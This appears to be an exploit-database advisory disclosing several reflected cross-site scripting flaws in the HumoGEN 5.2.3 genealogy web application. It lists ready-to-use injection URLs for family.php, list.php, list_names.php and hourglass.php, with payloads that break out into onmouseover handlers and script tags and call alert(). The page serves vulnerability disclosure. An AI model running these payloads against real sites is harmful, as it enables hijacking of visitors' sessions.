HumoGEN - Multiple XSS Inj.

2019.04.15
tr Mehmet EMIROGLU (TR) tr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=========================================================================================== # Exploit Title: HumoGEN - ’family.php’ XSS Inj. # Dork: N/A # Date: 08-04-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://www.humo-gen.com/ # Software Link: https://sourceforge.net/projects/humo-gen/ # Version: v5.2.3 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: HuMo-gen is an open-source server-side genealogy program, that dynamically displays genealogical data from a MySQL database as a website with numerous reports and charts. Webmasters can do online editing and users may choose from several languages. =========================================================================================== # POC - XSS # Parameters : family.php, dnachart,database, nsextt # Attack Pattern : %22%2balert(0x004F57)%2b%22 # GET Method : http://localhost/HuMogen523/family.php?database=humo_&id=F2&main_person=I5&screen_mode=STAR&dnachart="+alert(0x004F57)+" # GET Method : http://localhost/HuMogen523/family.php?database="+alert(0x004E1C)+"&id=F2&main_person=I5&screen_mode=STAR&dnachart=ydna =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: HumoGEN - ’list.php’ XSS Inj. # Dork: N/A # Date: 08-04-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://www.humo-gen.com/ # Software Link: https://sourceforge.net/projects/humo-gen/ # Version: v5.2.3 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: HuMo-gen is an open-source server-side genealogy program, that dynamically displays genealogical data from a MySQL database as a website with numerous reports and charts. Webmasters can do online editing and users may choose from several languages. =========================================================================================== # POC - XSS # Parameters : list.php, start, index_list, last_name # Attack Pattern : x%22+onmouseover%3dalert(0x0046AA)+x%3d%22 # GET Method : http://localhost/HuMogen523/list.php?index_list=quicksearch&start=x" onmouseover=alert(0x0046AA) x="&item=3&sort=sort_firstname&sort_desc=3 # GET Method : http://localhost/HuMogen523/list.php?database=humo_&index_list=x" onmouseover=alert(0x0046AA) x="&reset=1 # GET Method : http://localhost/HuMogen523/list.php?adv_search=1&index_list=x" onmouseover=alert(0x0046AA) x=" # GET Method : http://localhost/HuMogen523/list_names.php?database=humo_&last_name=x" onmouseover=alert(0x0046AA) x=" =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: HumoGEN - ’list_names.php’ XSS Inj. # Dork: N/A # Date: 08-04-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://www.humo-gen.com/ # Software Link: https://sourceforge.net/projects/humo-gen/ # Version: v5.2.3 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: HuMo-gen is an open-source server-side genealogy program, that dynamically displays genealogical data from a MySQL database as a website with numerous reports and charts. Webmasters can do online editing and users may choose from several languages. =========================================================================================== # POC - XSS # Parameters : list_names.php, last_name # Attack Pattern : x%22+onmouseover%3dalert(0x001DCB)+x%3d%22 # GET Method : http://localhost/HuMogen523/list_names.php?database=humo_&last_name=x" onmouseover=alert(0x001DCB) x=" =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: HumoGEN - ’chosensize’ XSS Inj. # Dork: N/A # Date: 08-04-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://www.humo-gen.com/ # Software Link: https://sourceforge.net/projects/humo-gen/ # Version: v5.2.3 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: HuMo-gen is an open-source server-side genealogy program, that dynamically displays genealogical data from a MySQL database as a website with numerous reports and charts. Webmasters can do online editing and users may choose from several languages. =========================================================================================== # POC - XSS # Parameters : chosensize, chosengen, database # Attack Pattern : ’"--></style></scRipt><scRipt>alert(0x000D38)</scRipt> # GET Method : http://localhost/HuMogen523/hourglass.php?id=F2&main_person=I4&direction=1&database=humo_&chosensize=’"--></style></scRipt><scRipt>alert(0x000D38)</scRipt>&chosengen=4&chosengenanc=3&screen_mode=HOUR ===========================================================================================


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top